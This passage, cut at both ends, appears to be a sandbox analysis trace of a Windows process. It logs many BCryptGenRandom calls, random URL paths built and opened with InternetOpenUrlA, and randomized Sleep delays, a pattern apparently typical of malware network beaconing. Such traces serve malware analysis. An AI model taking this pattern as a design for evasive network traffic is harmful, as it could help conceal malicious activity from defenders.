pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17e2e, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a17e2e) returned 0x0 [0269.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.115] GetProcessHeap () returned 0x440000 [0270.115] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0270.115] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0270.115] lstrcatA (in: lpString1="\x04", lpString2="/4xopwtvZ5rwFna80Ilv4sn1iyLe3bEgu0PA66wXux5b/a4jmh6o3MrktkvlwBcixq2q2i9rrlegl/lxumd7arrm4lii4ijG188/" | out: lpString1="\x04/4xopwtvZ5rwFna80Ilv4sn1iyLe3bEgu0PA66wXux5b/a4jmh6o3MrktkvlwBcixq2q2i9rrlegl/lxumd7arrm4lii4ijG188/") returned="\x04/4xopwtvZ5rwFna80Ilv4sn1iyLe3bEgu0PA66wXux5b/a4jmh6o3MrktkvlwBcixq2q2i9rrlegl/lxumd7arrm4lii4ijG188/" [0270.115] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0270.115] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/4xopwtvZ5rwFna80Ilv4sn1iyLe3bEgu0PA66wXux5b/a4jmh6o3MrktkvlwBcixq2q2i9rrlegl/lxumd7arrm4lii4ijG188/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0270.116] GetProcessHeap () returned 0x440000 [0270.116] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0270.116] GetProcessHeap () returned 0x440000 [0270.116] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17de0 | out: hHeap=0x440000) returned 1 [0270.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0270.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0270.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0270.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0270.117] Sleep (dwMilliseconds=0x1cb69) [0270.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0270.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.268] GetProcessHeap () returned 0x440000 [0270.268] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0270.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0270.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26a, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b26a) returned 0x0 [0270.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.282] GetProcessHeap () returned 0x440000 [0270.282] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0270.282] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0270.282] lstrcatA (in: lpString1="\x04", lpString2="/nu2ab6ko3p9wkxm59x1G5a7i/th24kegUyglmrrHr62jq/" | out: lpString1="\x04/nu2ab6ko3p9wkxm59x1G5a7i/th24kegUyglmrrHr62jq/") returned="\x04/nu2ab6ko3p9wkxm59x1G5a7i/th24kegUyglmrrHr62jq/" [0270.282] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0270.282] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/nu2ab6ko3p9wkxm59x1G5a7i/th24kegUyglmrrHr62jq/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0270.282] GetProcessHeap () returned 0x440000 [0270.282] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0270.282] GetProcessHeap () returned 0x440000 [0270.282] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0270.283] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0270.283] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0270.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0270.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0270.284] Sleep (dwMilliseconds=0x157b3) [0270.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0270.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.429] GetProcessHeap () returned 0x440000 [0270.429] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0270.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0270.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, 